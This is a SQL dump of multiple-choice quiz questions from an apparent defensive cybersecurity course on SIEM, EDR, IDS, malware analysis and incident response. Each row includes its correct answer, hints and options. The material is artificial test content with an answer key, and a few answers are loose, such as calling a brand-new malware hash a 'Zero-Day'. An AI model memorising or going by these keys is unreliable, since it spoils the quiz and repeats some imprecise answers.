(5887, 223, 'What is the goal of \"Normalization\"?', 1, 'Converting mixed formats into a standard field structure', 0, 'Standardization', '2025-12-26 22:35:58', '[\"Deleting logs\", \"Converting mixed formats into a standard field structure\", \"Encrypting logs\", \"Compressing logs\"]'),
(5888, 223, 'If Windows calls it \"AccountName\" and Linux calls it \"User\", what does the SIEM do?', 2, 'Maps them to a single field like user.name', 0, 'Mapping', '2025-12-26 22:35:58', '[\"Ignores them\", \"Maps them to a single field like user.name\", \"Deletes one\", \"Errors out\"]'),
(5889, 223, 'What process extracts \"192.168.1.1\" from a raw text message?', 3, 'Parsing', 0, 'Extraction', '2025-12-26 22:35:58', '[\"Hashing\", \"Parsing\", \"Encryption\", \"Routing\"]'),
(5890, 224, 'What defines a \"Brute Force\" correlation rule?', 1, 'Multiple failed logins in a short time', 0, 'Many fails', '2025-12-26 22:35:58', '[\"One failed login\", \"Multiple failed logins in a short time\", \"A successful login\", \"A slow login\"]'),
(5891, 224, 'What is \"Impossible Travel\"?', 2, 'Logins from two distant locations in an impossibly short time', 0, 'Teleportation', '2025-12-26 22:35:58', '[\"Traveling without a visa\", \"Logins from two distant locations in an impossibly short time\", \"VPN usage\", \"Remote work\"]'),
(5892, 224, 'Adjusting a rule to reduce False Positives is called:', 3, 'Tuning', 0, 'Adjustment', '2025-12-26 22:35:58', '[\"Breaking\", \"Tuning\", \"Deleting\", \"Ignoring\"]'),
(5893, 225, 'What query language does Splunk use?', 1, 'SPL (Search Processing Language)', 0, 'SPL', '2025-12-26 22:35:58', '[\"SQL\", \"SPL (Search Processing Language)\", \"KQL\", \"Python\"]'),
(5894, 225, 'What query language does Microsoft Sentinel use?', 2, 'KQL (Kusto Query Language)', 0, 'Kusto', '2025-12-26 22:35:58', '[\"SPL\", \"KQL (Kusto Query Language)\", \"Bash\", \"PowerShell\"]'),
(5895, 225, 'What is a major downside of Splunk traditionally?', 3, 'High cost', 0, 'Expensive', '2025-12-26 22:35:58', '[\"It is slow\", \"High cost\", \"It has no features\", \"It only runs on Mac\"]'),
(5896, 226, 'Which component of ELK provides the Visualization / Dashboard?', 1, 'Kibana', 0, 'UI', '2025-12-26 22:35:58', '[\"Elasticsearch\", \"Kibana\", \"Logstash\", \"Beats\"]'),
(5897, 226, 'What is the Database/Search Engine of the stack?', 2, 'Elasticsearch', 0, 'DB', '2025-12-26 22:35:58', '[\"MySQL\", \"Elasticsearch\", \"Redis\", \"Mongo\"]'),
(5898, 226, 'What are \"Beats\"?', 3, 'Lightweight data shippers/agents', 0, 'Agents', '2025-12-26 22:35:58', '[\"Music files\", \"Lightweight data shippers/agents\", \"Databases\", \"Firewalls\"]'),
(5899, 227, 'What makes Wazuh unique compared to basic ELK?', 1, 'It includes XDR features like FIM and Active Response', 0, 'XDR', '2025-12-26 22:35:58', '[\"It costs money\", \"It includes XDR features like FIM and Active Response\", \"It has no UI\", \"It creates viruses\"]'),
(5900, 227, 'What is \"Active Response\" in Wazuh?', 2, 'The ability to automatically block/stop a threat', 0, 'Action', '2025-12-26 22:35:58', '[\"Sending an email\", \"The ability to automatically block/stop a threat\", \"Deleting the server\", \"Calling the police\"]'),
(5901, 227, 'Is Wazuh open source?', 3, 'Yes', 0, 'Free', '2025-12-26 22:35:58', '[\"No\", \"Yes\", \"Only for students\", \"It is a subscription\"]'),
(5902, 228, 'What is the \"Normalization\" phase in SIEM?', 1, 'Mapping different log formats to standard fields', 0, 'Standardize', '2025-12-26 22:35:58', '[\"Compressing logs\", \"Mapping different log formats to standard fields\", \"Deleting logs\", \"Encrypting logs\"]'),
(5903, 228, 'Garbage In, Garbage Out refers to:', 2, 'A SIEM is only as good as the log data fed into it', 0, 'Input quality', '2025-12-26 22:35:58', '[\"Trash management\", \"A SIEM is only as good as the log data fed into it\", \"Deleting logs\", \"Hardware recycling\"]'),
(5904, 228, 'What is \"Impossible Travel\"?', 3, 'Logins from two locations physically impossible to traverse in the time', 0, 'Teleportation', '2025-12-26 22:35:58', '[\"VPN usage\", \"Logins from two locations physically impossible to traverse in the time\", \"Dual citizenship\", \"Space travel\"]'),
(5905, 228, 'SPL (Search Processing Language) belongs to which SIEM?', 4, 'Splunk', 0, 'The big one', '2025-12-26 22:35:58', '[\"Sentinel\", \"Splunk\", \"Wazuh\", \"ELK\"]'),
(5906, 228, 'KQL (Kusto Query Language) belongs to which SIEM?', 5, 'Microsoft Sentinel', 0, 'Azure', '2025-12-26 22:35:58', '[\"Splunk\", \"Microsoft Sentinel\", \"QRadar\", \"ArcSight\"]'),
(5907, 228, 'Which open-source tool allows for \"Active Response\" (blocking IPs)?', 6, 'Wazuh', 0, 'XDR', '2025-12-26 22:35:58', '[\"Logstash\", \"Wazuh\", \"Kibana\", \"Notepad\"]'),
(5908, 228, 'In the ELK stack, which tool is the \"UI\"?', 7, 'Kibana', 0, 'Visualizer', '2025-12-26 22:35:58', '[\"Elasticsearch\", \"Kibana\", \"Logstash\", \"Filebeat\"]'),
(5909, 228, 'What does a \"Forwarder\" do?', 8, 'Sends logs from the endpoint to the SIEM', 0, 'Transportation', '2025-12-26 22:35:58', '[\"Stores logs\", \"Sends logs from the endpoint to the SIEM\", \"Deletes logs\", \"Analyzes logs\"]'),
(5910, 228, 'Why do we need \"Retention\"?', 9, 'Compliance regulations often require keeping logs for 1 year+', 0, 'Compliance', '2025-12-26 22:35:58', '[\"To run out of space\", \"Compliance regulations often require keeping logs for 1 year+\", \"To slow down searches\", \"We don\'t\"]'),
(5911, 231, 'What is the Attacker\'s IP address?', 1, '192.168.1.55', 0, 'IP', '2025-12-26 22:41:26', '[\"127.0.0.1\", \"192.168.1.55\", \"10.0.0.1\", \"8.8.8.8\"]'),
(5912, 231, 'Did the attacker succeed?', 2, 'Yes, the last log says \"Accepted\"', 0, 'Success', '2025-12-26 22:41:26', '[\"No, all failed\", \"Yes, the last log says \\\"Accepted\\\"\", \"Maybe\", \"Unknown\"]'),
(5913, 231, 'Which account was targeted?', 3, 'root', 0, 'Admin', '2025-12-26 22:41:26', '[\"admin\", \"user\", \"root\", \"guest\"]'),
(5914, 232, 'What is the time interval between connections?', 1, '5 Minutes', 0, 'Regularity', '2025-12-26 22:41:26', '[\"1 Minute\", \"5 Minutes\", \"Random\", \"1 Hour\"]'),
(5915, 232, 'Why is \"Regularity\" suspicious?', 2, 'Machines are precise, humans are random', 0, 'Automation', '2025-12-26 22:41:26', '[\"It isn\'t\", \"Machines are precise, humans are random\", \"It means the network is fast\", \"It is normal\"]'),
(5916, 232, 'What destination IP is the victim talking to?', 3, '45.33.2.1', 0, 'C2', '2025-12-26 22:41:26', '[\"10.10.1.100\", \"127.0.0.1\", \"45.33.2.1\", \"192.168.1.1\"]'),
(5917, 233, 'What is the time difference between the two logins?', 1, '1 hour 15 minutes', 0, 'Delta', '2025-12-26 22:41:26', '[\"5 minutes\", \"1 hour 15 minutes\", \"8 hours\", \"1 day\"]'),
(5918, 233, 'Which user account is affected?', 2, 'alice@company.com', 0, 'User', '2025-12-26 22:41:26', '[\"bob\", \"admin\", \"alice@company.com\", \"root\"]'),
(5919, 233, 'What is the most likely malicious explanation?', 3, 'Credential Theft', 0, 'Stolen Creds', '2025-12-26 22:41:26', '[\"VPN\", \"Credential Theft\", \"Fast Plane\", \"Bug\"]'),
(5920, 234, 'Which group was the user added to?', 1, 'Domain Admins', 0, 'Admin', '2025-12-26 22:41:26', '[\"Users\", \"Guests\", \"Domain Admins\", \"Print Operators\"]'),
(5921, 234, 'What Windows Event ID indicates \"Member Added to Group\"?', 2, '4728', 0, 'ID', '2025-12-26 22:41:26', '[\"4624\", \"4728\", \"1102\", \"514\"]'),
(5922, 234, 'Why is the timestamp (03:00 AM) relevant?', 3, 'Off-hours changes are suspicious', 0, 'Night', '2025-12-26 22:41:26', '[\"It is daytime\", \"Off-hours changes are suspicious\", \"Servers restart then\", \"It is normal\"]'),
(5923, 235, 'What is hidden inside the long subdomains?', 1, 'Exfiltrated Data (Encoded)', 0, 'Stolen integrity', '2025-12-26 22:41:26', '[\"Nothing\", \"Exfiltrated Data (Encoded)\", \"IP addresses\", \"Viruses\"]'),
(5924, 235, 'Why do attackers use DNS for exfiltration?', 2, 'Firewalls usually allow Port 53 (DNS) outbound', 0, 'Port 53', '2025-12-26 22:41:26', '[\"It is faster\", \"Firewalls usually allow Port 53 (DNS) outbound\", \"It is encrypted\", \"It compresses data\"]'),
(5925, 235, 'What characteristic of the query string indicates tunneling?', 3, 'Length and High Entropy (Randomness)', 0, 'Long', '2025-12-26 22:41:26', '[\"Short length\", \"Length and High Entropy (Randomness)\", \"It is .com\", \"It is readable\"]'),
(5926, 236, 'In the Firewall log, what is the source IP doing?', 1, 'Port Scanning (trying different ports rapidly)', 0, 'SCAN', '2025-12-26 22:41:26', '[\"Downloading files\", \"Port Scanning (trying different ports rapidly)\", \"Updating\", \"Browsing web\"]'),
(5927, 236, 'What action did the firewall take?', 2, 'BLOCK', 0, 'Action', '2025-12-26 22:41:26', '[\"ALLOW\", \"BLOCK\", \"PASS\", \"LOG\"]'),
(5928, 236, 'What event ID represents a Successful Login?', 3, '4624', 0, 'ID', '2025-12-26 22:41:26', '[\"4625\", \"4624\", \"1000\", \"52\"]'),
(5929, 236, 'What time did the login occur?', 4, '02:00 AM', 0, 'Time', '2025-12-26 22:41:26', '[\"23:55\", \"02:00 AM\", \"Noon\", \"Midnight\"]'),
(5930, 236, 'In the Brute Force scenario, what indicates success?', 5, 'A \"Success\" or \"Accepted\" log after failures', 0, 'Win', '2025-12-26 22:41:26', '[\"More failures\", \"A \\\"Success\\\" or \\\"Accepted\\\" log after failures\", \"Nothing\", \"A lockout\"]'),
(5931, 236, 'How do you detect \"Beaconing\"?', 6, 'Regular time intervals (Heartbeat)', 0, 'Rhythm', '2025-12-26 22:41:26', '[\"High bandwidth\", \"Regular time intervals (Heartbeat)\", \"Random times\", \"Different IPs\"]'),
(5932, 241, 'What does EDR primarily monitor?', 1, 'Endpoint activities (Processes, Files, Network)', 0, 'Endpoint', '2025-12-26 22:47:08', '[\"Network traffic only\", \"Endpoint activities (Processes, Files, Network)\", \"Server hardware\", \"Cloud storage\"]'),
(5933, 241, 'What is a key \"Response\" capability of EDR?', 2, 'Isolating a machine from the network', 0, 'Containment', '2025-12-26 22:47:08', '[\"Sending email alerts\", \"Isolating a machine from the network\", \"Writing reports\", \"Installing updates\"]'),
(5934, 241, 'Where does the EDR Agent run?', 3, 'On each endpoint (laptop/server)', 0, 'Client side', '2025-12-26 22:47:08', '[\"In the cloud\", \"On the firewall\", \"On each endpoint (laptop/server)\", \"In a SIEM\"]'),
(5935, 242, 'What is the primary detection method for traditional Antivirus?', 1, 'Signatures (File Hashes)', 0, 'Hash', '2025-12-26 22:47:08', '[\"Behavior analysis\", \"Signatures (File Hashes)\", \"AI\", \"Network scanning\"]'),
(5936, 242, 'If malware uses a brand-new hash, what is this called?', 2, 'Zero-Day', 0, 'New', '2025-12-26 22:47:08', '[\"First-Day\", \"Zero-Day\", \"New Hash\", \"Fresh Malware\"]'),
(5937, 242, 'What does EDR provide that AV typically does not?', 3, 'Full context and telemetry (Process Tree, etc.)', 0, 'Visibility', '2025-12-26 22:47:08', '[\"A firewall\", \"Full context and telemetry (Process Tree, etc.)\", \"Email scanning\", \"Physical security\"]'),
(5938, 243, 'What does a Process Tree show?', 1, 'Which process started which other process', 0, 'Ancestry', '2025-12-26 22:47:08', '[\"Network connections\", \"Which process started which other process\", \"File locations\", \"User logins\"]'),
(5939, 243, 'In \"explorer.exe -> chrome.exe\", which is the Parent?', 2, 'explorer.exe', 0, 'Desktop', '2025-12-26 22:47:08', '[\"chrome.exe\", \"explorer.exe\", \"System\", \"Neither\"]'),
(5940, 243, 'Why is \"winword.exe -> cmd.exe -> powershell.exe\" suspicious?', 3, 'Office apps should not spawn shells', 0, 'Unexpected child', '2025-12-26 22:47:08', '[\"It is normal\", \"Office apps should not spawn shells\", \"PowerShell is fast\", \"CMD is old\"]'),
(5941, 244, 'Which parent legitimately spawns svchost.exe?', 1, 'services.exe', 0, 'Services Manager', '2025-12-26 22:47:08', '[\"explorer.exe\", \"word.exe\", \"services.exe\", \"chrome.exe\"]'),
(5942, 244, 'If Excel spawns wscript.exe, what is the likely cause?', 2, 'A malicious VBA Macro', 0, 'Macro', '2025-12-26 22:47:08', '[\"A print job\", \"A malicious VBA Macro\", \"An update\", \"Normal behavior\"]'),
(5943, 244, 'What does \"-EncodedCommand\" in PowerShell indicate?', 3, 'Base64-encoded script (often malicious)', 0, 'Obfuscation', '2025-12-26 22:47:08', '[\"Help text\", \"Fast mode\", \"Base64-encoded script (often malicious)\", \"Admin mode\"]'),
(5944, 245, 'In a phishing attack, which application typically spawns cmd.exe?', 1, 'The Office application (Word/Excel)', 0, 'Office', '2025-12-26 22:47:08', '[\"Explorer\", \"The Office application (Word/Excel)\", \"Chrome\", \"Notepad\"]'),
(5945, 245, 'What does \"Living off the Land\" mean?', 2, 'Using built-in tools (PowerShell, WMI) instead of malware', 0, 'No foreign tools', '2025-12-26 22:47:08', '[\"Farming\", \"Using built-in tools (PowerShell, WMI) instead of malware\", \"Using old malware\", \"Running slowly\"]'),
(5946, 245, 'Why is \"certutil\" used by attackers?', 3, 'It can download files (LOLBIN)', 0, 'Built-in downloader', '2025-12-26 22:47:08', '[\"It encrypts data\", \"It can download files (LOLBIN)\", \"It scans networks\", \"It deletes logs\"]'),
(5947, 246, 'Which EDR is famous for APT tracking (e.g., Fancy Bear)?', 1, 'CrowdStrike', 0, 'Falcon', '2025-12-26 22:47:08', '[\"SentinelOne\", \"CrowdStrike\", \"Carbon Black\", \"Elastic\"]'),
(5948, 246, 'Which EDR is native to Windows and uses KQL?', 2, 'Microsoft Defender for Endpoint', 0, 'MDE', '2025-12-26 22:47:08', '[\"CrowdStrike\", \"SentinelOne\", \"Microsoft Defender for Endpoint\", \"Carbon Black\"]'),
(5949, 246, 'Which EDR can autonomously \"rollback\" ransomware damage?', 3, 'SentinelOne', 0, 'Autonomous', '2025-12-26 22:47:08', '[\"CrowdStrike\", \"Carbon Black\", \"SentinelOne\", \"Elastic\"]'),
(5950, 247, 'What is the Grandparent of powershell.exe?', 1, 'WINWORD.EXE', 0, 'Word', '2025-12-26 22:47:08', '[\"explorer.exe\", \"outlook.exe\", \"WINWORD.EXE\", \"cmd.exe\"]'),
(5951, 247, 'What is the likely initial attack vector?', 2, 'A malicious email attachment (phishing)', 0, 'Phishing', '2025-12-26 22:47:08', '[\"USB drive\", \"A malicious email attachment (phishing)\", \"Direct network attack\", \"Insider\"]'),
(5952, 247, 'What do whoami, ipconfig, net user suggest?', 3, 'Reconnaissance / Discovery', 0, 'Recon', '2025-12-26 22:47:08', '[\"Cleanup\", \"Reconnaissance / Discovery\", \"Data destruction\", \"Patching\"]'),
(5953, 247, 'The \"-enc\" flag in PowerShell indicates:', 4, 'Base64-encoded command (obfuscation)', 0, 'Hidden command', '2025-12-26 22:47:08', '[\"Encryption\", \"Base64-encoded command (obfuscation)\", \"Error logging\", \"Network mode\"]'),
(5954, 247, 'What is the key difference between AV and EDR?', 5, 'EDR provides visibility and behavior analysis', 0, 'Telemetry', '2025-12-26 22:47:08', '[\"EDR is cheaper\", \"EDR provides visibility and behavior analysis\", \"AV is newer\", \"AV blocks more\"]'),
(5955, 247, 'Which process is the legitimate parent of svchost.exe?', 6, 'services.exe', 0, 'Service Controller', '2025-12-26 22:47:08', '[\"explorer.exe\", \"winlogon.exe\", \"services.exe\", \"cmd.exe\"]'),
(5956, 251, 'Where is a NIDS typically deployed?', 1, 'At network choke points (e.g., behind firewall)', 0, 'Network edge', '2025-12-26 22:50:58', '[\"On each laptop\", \"At network choke points (e.g., behind firewall)\", \"In the cloud only\", \"On the router console\"]'),
(5957, 251, 'What is a major weakness of NIDS?', 2, 'Blind to encrypted traffic (TLS)', 0, 'Encryption', '2025-12-26 22:50:58', '[\"It is slow\", \"Blind to encrypted traffic (TLS)\", \"It needs batteries\", \"It cannot see packets\"]'),
(5958, 251, 'Which tool is a common HIDS agent?', 3, 'OSSEC / Wazuh', 0, 'Host agent', '2025-12-26 22:50:58', '[\"Snort\", \"OSSEC / Wazuh\", \"Wireshark\", \"Nmap\"]'),
(5959, 252, 'What is the main weakness of Signature-Based detection?', 1, 'Cannot detect Zero-Day (unknown) attacks', 0, 'New threats', '2025-12-26 22:50:58', '[\"Too many alerts\", \"Cannot detect Zero-Day (unknown) attacks\", \"It is expensive\", \"It requires hardware\"]'),
(5960, 252, 'Anomaly-Based detection learns a _____ of normal behavior.', 2, 'Baseline', 0, 'Normal', '2025-12-26 22:50:58', '[\"Signature\", \"Baseline\", \"Firewall\", \"Password\"]'),
(5961, 252, 'Which method typically has more False Positives?', 3, 'Anomaly-Based', 0, 'Noisy', '2025-12-26 22:50:58', '[\"Signature-Based\", \"Anomaly-Based\", \"Neither\", \"Both equally\"]'),
(5962, 253, 'In a Snort rule, what does \"sid\" stand for?', 1, 'Signature ID', 0, 'Unique ID', '2025-12-26 22:50:58', '[\"Session ID\", \"Signature ID\", \"Source ID\", \"Snort ID\"]'),
(5963, 253, 'What action does \"alert\" perform in Snort?', 2, 'Logs and generates an alert', 0, 'Notify', '2025-12-26 22:50:58', '[\"Blocks traffic\", \"Logs and generates an alert\", \"Drops the packet\", \"Ignores it\"]'),
(5964, 253, 'What symbol defines direction in Snort rules?', 3, '-> (Arrow)', 0, 'Arrow', '2025-12-26 22:50:58', '[\"<-\", \"-> (Arrow)\", \"==\", \"=>\"]'),
(5965, 254, 'What is a major performance advantage of Suricata over Snort 2?', 1, 'Multi-threading (uses all CPU cores)', 0, 'Parallel', '2025-12-26 22:50:58', '[\"It is smaller\", \"Multi-threading (uses all CPU cores)\", \"It has a GUI\", \"It is older\"]'),
(5966, 254, 'Can Suricata use Snort rules?', 2, 'Yes', 0, 'Compatible', '2025-12-26 22:50:58', '[\"No\", \"Yes\", \"Only some\", \"Only paid\"]'),
(5967, 254, 'What does Suricata\'s \"File Extraction\" feature do?', 3, 'Saves suspicious files from network traffic', 0, 'Carving', '2025-12-26 22:50:58', '[\"Deletes files\", \"Saves suspicious files from network traffic\", \"Encrypts files\", \"Compresses files\"]'),
(5968, 255, 'What is the first step when triaging an IDS alert?', 1, 'Read the alert message to understand the claim', 0, 'Understand', '2025-12-26 22:50:58', '[\"Delete it\", \"Read the alert message to understand the claim\", \"Block the IP\", \"Reboot the server\"]'),
(5969, 255, 'What often causes False Positives from internal security scanners?', 2, 'Scanners like Nessus trigger \"Port Scan\" rules', 0, 'Your own tools', '2025-12-26 22:50:58', '[\"Hackers\", \"Scanners like Nessus trigger \\\"Port Scan\\\" rules\", \"Viruses\", \"Weather\"]'),
(5970, 255, 'What is \"Tuning\" an IDS rule?', 3, 'Adjusting it to reduce false positives', 0, 'Improve accuracy', '2025-12-26 22:50:58', '[\"Deleting the rule\", \"Adjusting it to reduce false positives\", \"Making it louder\", \"Breaking it\"]'),
(5971, 256, 'Which IDS type monitors network traffic at a choke point?', 1, 'NIDS', 0, 'Network', '2025-12-26 22:50:58', '[\"HIDS\", \"NIDS\", \"SIDS\", \"AIDS\"]'),
(5972, 256, 'Which IDS type can see inside encrypted sessions on the host?', 2, 'HIDS', 0, 'Host', '2025-12-26 22:50:58', '[\"NIDS\", \"HIDS\", \"Firewall\", \"VPN\"]'),
(5973, 256, 'Signature-Based detection relies on:', 3, 'A database of known attack patterns', 0, 'Signatures', '2025-12-26 22:50:58', '[\"Learning normal behavior\", \"A database of known attack patterns\", \"User reports\", \"Random chance\"]'),
(5974, 256, 'Anomaly-Based detection can find:', 4, 'Zero-Day attacks', 0, 'Novel threats', '2025-12-26 22:50:58', '[\"Only known attacks\", \"Zero-Day attacks\", \"Nothing\", \"Old malware\"]'),
(5975, 256, 'Which tool is native multi-threaded?', 5, 'Suricata', 0, 'Performance', '2025-12-26 22:50:58', '[\"Snort 2\", \"Suricata\", \"Wireshark\", \"Nmap\"]'),
(5976, 256, 'In Snort, what does \"msg\" specify?', 6, 'The alert message text', 0, 'Description', '2025-12-26 22:50:58', '[\"Source IP\", \"The alert message text\", \"Destination port\", \"Protocol\"]'),
(5977, 261, 'Which malware type encrypts your files and demands payment?', 1, 'Ransomware', 0, 'Ransom', '2025-12-26 22:55:56', '[\"Spyware\", \"Ransomware\", \"Worm\", \"Virus\"]'),
(5978, 261, 'What makes a Worm different from a Virus?', 2, 'Worms spread without user interaction', 0, 'Self-replicating', '2025-12-26 22:55:56', '[\"Worms are bigger\", \"Worms spread without user interaction\", \"Viruses are newer\", \"No difference\"]'),
(5979, 261, 'What is \"Fileless Malware\"?', 3, 'Malware that lives in RAM, not on disk', 0, 'Memory-only', '2025-12-26 22:55:56', '[\"Malware with no code\", \"Malware that lives in RAM, not on disk\", \"Malware that is deleted\", \"Malware on USB\"]'),
(5980, 262, 'What is Static Analysis?', 1, 'Examining malware without executing it', 0, 'Not running', '2025-12-26 22:55:56', '[\"Running malware in a sandbox\", \"Examining malware without executing it\", \"Asking the malware questions\", \"Deleting the malware\"]'),
(5981, 262, 'What is a major risk of Dynamic Analysis?', 2, 'Sandbox escape', 0, 'Containment failure', '2025-12-26 22:55:56', '[\"It is too slow\", \"Sandbox escape\", \"It is too expensive\", \"Nothing\"]'),
(5982, 262, 'What tool is commonly used for strings extraction?', 3, 'strings command', 0, 'Text', '2025-12-26 22:55:56', '[\"Wireshark\", \"strings command\", \"Nmap\", \"Burp Suite\"]'),
(5983, 263, 'Why should you use \"Host-Only\" networking for a malware lab?', 1, 'To prevent the malware from reaching the internet', 0, 'Isolation', '2025-12-26 22:55:56', '[\"It is faster\", \"To prevent the malware from reaching the internet\", \"It is default\", \"For gaming\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(5984, 263, 'What is FlareVM?', 2, 'A pre-configured Windows VM for malware analysis', 0, 'Mandiant tool', '2025-12-26 22:55:56', '[\"A virus\", \"A pre-configured Windows VM for malware analysis\", \"A firewall\", \"An antivirus\"]'),
(5985, 263, 'What should you do BEFORE running malware in a VM?', 3, 'Take a snapshot', 0, 'Snapshot', '2025-12-26 22:55:56', '[\"Delete all files\", \"Take a snapshot\", \"Turn off the firewall\", \"Install games\"]'),
(5986, 264, 'What does high entropy (>7.0) in a file suggest?', 1, 'The file is packed or encrypted', 0, 'Obfuscation', '2025-12-26 22:55:56', '[\"It is small\", \"The file is packed or encrypted\", \"It is safe\", \"It is old\"]'),
(5987, 264, 'If a PE file imports \"VirtualAlloc\", what might it be doing?', 2, 'Memory allocation for code injection', 0, 'Injection', '2025-12-26 22:55:56', '[\"Playing music\", \"Memory allocation for code injection\", \"Deleting files\", \"Printing documents\"]'),
(5988, 264, 'Why hash a malware sample before analysis?', 3, 'To check VirusTotal for known info', 0, 'Lookup', '2025-12-26 22:55:56', '[\"To delete it\", \"To check VirusTotal for known info\", \"To run it\", \"To rename it\"]'),
(5989, 265, 'What is Any.Run used for?', 1, 'Interactive malware sandboxing', 0, 'Sandbox', '2025-12-26 22:55:56', '[\"Static analysis\", \"Interactive malware sandboxing\", \"Coding\", \"Email\"]'),
(5990, 265, 'If malware adds a \"Run\" registry key, what is it likely achieving?', 2, 'Persistence (auto-start)', 0, 'Persistence', '2025-12-26 22:55:56', '[\"Deleting files\", \"Persistence (auto-start)\", \"Playing music\", \"Updating\"]'),
(5991, 265, 'How might malware detect it is in a sandbox?', 3, 'Looking for VM artifacts or lack of user activity', 0, 'Evasion', '2025-12-26 22:55:56', '[\"By asking the user\", \"Looking for VM artifacts or lack of user activity\", \"By checking the calendar\", \"By running fast\"]'),
(5992, 266, 'What does IOC stand for?', 1, 'Indicators of Compromise', 0, 'Evidence', '2025-12-26 22:55:56', '[\"Internet of Computers\", \"Indicators of Compromise\", \"Input Output Control\", \"Internal Office Command\"]'),
(5993, 266, 'What is a \"Mutex\" in malware context?', 2, 'A unique name to prevent multiple instances', 0, 'Single instance', '2025-12-26 22:55:56', '[\"A virus type\", \"A unique name to prevent multiple instances\", \"A password\", \"A file extension\"]'),
(5994, 266, 'Which framework maps malware techniques?', 3, 'MITRE ATT&CK', 0, 'Tactics', '2025-12-26 22:55:56', '[\"NIST\", \"MITRE ATT&CK\", \"ISO 27001\", \"PCI DSS\"]'),
(5995, 267, 'Which malware hides deep in the OS to maintain persistent access?', 1, 'Rootkit', 0, 'Hidden', '2025-12-26 22:55:56', '[\"Worm\", \"Trojan\", \"Rootkit\", \"Virus\"]'),
(5996, 267, 'Which attack gives an attacker full remote control?', 2, 'RAT (Remote Access Trojan)', 0, 'Remote', '2025-12-26 22:55:56', '[\"Rootkit\", \"Spyware\", \"RAT (Remote Access Trojan)\", \"Worm\"]'),
(5997, 267, 'Running malware in a sandbox is called:', 3, 'Dynamic Analysis', 0, 'Execute', '2025-12-26 22:55:56', '[\"Static Analysis\", \"Dynamic Analysis\", \"Passive Analysis\", \"Code Review\"]'),
(5998, 267, 'Examining a file without executing it is:', 4, 'Static Analysis', 0, 'Safe', '2025-12-26 22:55:56', '[\"Dynamic Analysis\", \"Static Analysis\", \"Behavioral Analysis\", \"Reverse Engineering\"]'),
(5999, 267, 'What does PEStudio analyze?', 5, 'Windows PE (Executable) files', 0, 'EXE', '2025-12-26 22:55:56', '[\"Linux binaries\", \"Windows PE (Executable) files\", \"Network packets\", \"JSON files\"]'),
(6000, 267, 'If malware \"sleeps\" for a long time, what might it be doing?', 6, 'Evading sandbox analysis', 0, 'Timeout', '2025-12-26 22:55:56', '[\"Updating\", \"Evading sandbox analysis\", \"Nothing suspicious\", \"Downloading updates\"]'),
(6001, 271, 'What does CSIRT stand for?', 1, 'Computer Security Incident Response Team', 0, 'Team', '2025-12-26 23:03:48', '[\"Cyber Security Internal Review Team\", \"Computer Security Incident Response Team\", \"Critical System IR Team\", \"Cloud Security IR Task\"]'),
(6002, 271, 'Why is a documented IR process important?', 2, 'It ensures consistent and fast response', 0, 'Consistency', '2025-12-26 23:03:48', '[\"It looks good\", \"It ensures consistent and fast response\", \"It is optional\", \"It slows things down\"]'),
(6003, 271, 'Which of these is an example of a security incident?', 3, 'Malware infection', 0, 'Breach', '2025-12-26 23:03:48', '[\"Password reset\", \"Malware infection\", \"Software update\", \"New employee onboarding\"]'),
(6004, 272, 'How many phases are in the NIST IR lifecycle?', 1, '4', 0, 'Four', '2025-12-26 23:03:48', '[\"3\", \"4\", \"5\", \"6\"]'),
(6005, 272, 'Which phase comes after \"Detection & Analysis\"?', 2, 'Containment, Eradication & Recovery', 0, 'Next', '2025-12-26 23:03:48', '[\"Preparation\", \"Containment, Eradication & Recovery\", \"Post-Incident\", \"None\"]'),
(6006, 272, 'What happens after \"Lessons Learned\"?', 3, 'Loop back to Preparation (improvement)', 0, 'Cycle', '2025-12-26 23:03:48', '[\"Nothing\", \"Loop back to Preparation (improvement)\", \"Delete everything\", \"Close the case\"]'),
(6007, 273, 'What is a \"Playbook\" in IR context?', 1, 'A step-by-step guide for handling specific incidents', 0, 'Runbook', '2025-12-26 23:03:48', '[\"A video game\", \"A step-by-step guide for handling specific incidents\", \"A backup plan\", \"A training manual\"]'),
(6008, 273, 'What is a \"Jump Bag\"?', 2, 'Pre-packed forensic tools for on-site response', 0, 'Go Bag', '2025-12-26 23:03:48', '[\"A travel bag\", \"Pre-packed forensic tools for on-site response\", \"A backup drive\", \"A parachute\"]'),
(6009, 273, 'Why is \"Baselining\" systems important?', 3, 'To know what normal looks like', 0, 'Comparison', '2025-12-26 23:03:48', '[\"It is not\", \"To know what normal looks like\", \"To delete old files\", \"To upgrade software\"]'),
(6010, 274, 'What is the first step in analysis?', 1, 'Validate if it is a True Positive', 0, 'Confirm', '2025-12-26 23:03:48', '[\"Delete the alert\", \"Validate if it is a True Positive\", \"Call the police\", \"Ignore it\"]'),
(6011, 274, 'What should you start documenting immediately?', 2, 'A timeline of events', 0, 'Timeline', '2025-12-26 23:03:48', '[\"A blog post\", \"A timeline of events\", \"A resignation letter\", \"A shopping list\"]'),
(6012, 274, 'Who might notify you of an incident externally?', 3, 'FBI, vendor, or partner', 0, 'External', '2025-12-26 23:03:48', '[\"The janitor\", \"FBI, vendor, or partner\", \"The intern\", \"Nobody\"]'),
(6013, 275, 'What is \"Short-Term Containment\"?', 1, 'Immediate actions to stop the attack', 0, 'Quick fix', '2025-12-26 23:03:48', '[\"Long-term planning\", \"Immediate actions to stop the attack\", \"Deleting files\", \"Rebooting\"]'),
(6014, 275, 'Why should you NOT shut down a compromised machine immediately?', 2, 'Volatile memory (RAM) evidence is lost', 0, 'Forensics', '2025-12-26 23:03:48', '[\"It is faster\", \"Volatile memory (RAM) evidence is lost\", \"It makes noise\", \"It uses electricity\"]'),
(6015, 275, 'What is a quarantine VLAN used for?', 3, 'Isolating compromised systems while keeping them accessible', 0, 'Isolation', '2025-12-26 23:03:48', '[\"Gaming\", \"Isolating compromised systems while keeping them accessible\", \"Faster internet\", \"Printer sharing\"]'),
(6016, 276, 'What must be removed during Eradication?', 1, 'Malware and persistence mechanisms', 0, 'Cleanup', '2025-12-26 23:03:48', '[\"User files\", \"Malware and persistence mechanisms\", \"Operating system\", \"All software\"]'),
(6017, 276, 'Before reconnecting a recovered system, what should you do?', 2, 'Validate it is clean', 0, 'Verify', '2025-12-26 23:03:48', '[\"Just plug it in\", \"Validate it is clean\", \"Delete everything\", \"Ignore it\"]'),
(6018, 276, 'Why \"gradual reconnection\"?', 3, 'To detect re-infection before spreading', 0, 'Careful', '2025-12-26 23:03:48', '[\"It is slower\", \"To detect re-infection before spreading\", \"To save power\", \"It looks professional\"]'),
